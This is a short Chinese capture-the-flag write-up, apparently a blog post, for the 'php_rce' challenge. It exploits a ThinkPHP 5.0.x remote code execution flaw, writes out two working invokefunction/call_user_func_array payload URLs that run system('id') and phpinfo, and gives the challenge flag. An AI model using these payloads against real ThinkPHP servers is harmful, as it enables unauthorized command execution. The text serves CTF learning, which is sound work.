攻防世界-php_rce详解

本文详细介绍了如何利用ThinkPHP 5.0.2框架中的远程命令执行(RCE)漏洞。通过特定的payload,成功在目标环境中执行了远程命令,如ls和phpinfo,最终在根目录下找到了flag文件,揭示了flag{thinkphp5_rce}

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

php_rce

在这里插入图片描述
进入后发现是一个php框架,根据题目php-rce远程命令执行,我们在github上一下这个版本有什么漏洞:
在这里插入图片描述
在这里插入图片描述
发现好几个版本,我们只知道5.0随便输入一个试一试,发下新有提示为5.0.2
在这里插入图片描述
payload

6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

(注意这里我们只复制thinkphp_5.0.21后面的,因为前面是靶场地址 )

发现可以进行远程命令执行:
在这里插入图片描述
ls查看目录没有什么可疑的
在这里插入图片描述
继续查看上级目录,最终在根目录下查到flag文件
在这里插入图片描述
用find命令查找与flag相关的
在这里插入图片描述
在这里插入图片描述
flag:
flag{thinkphp5_rce} flag{thinkphp5_rce}

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值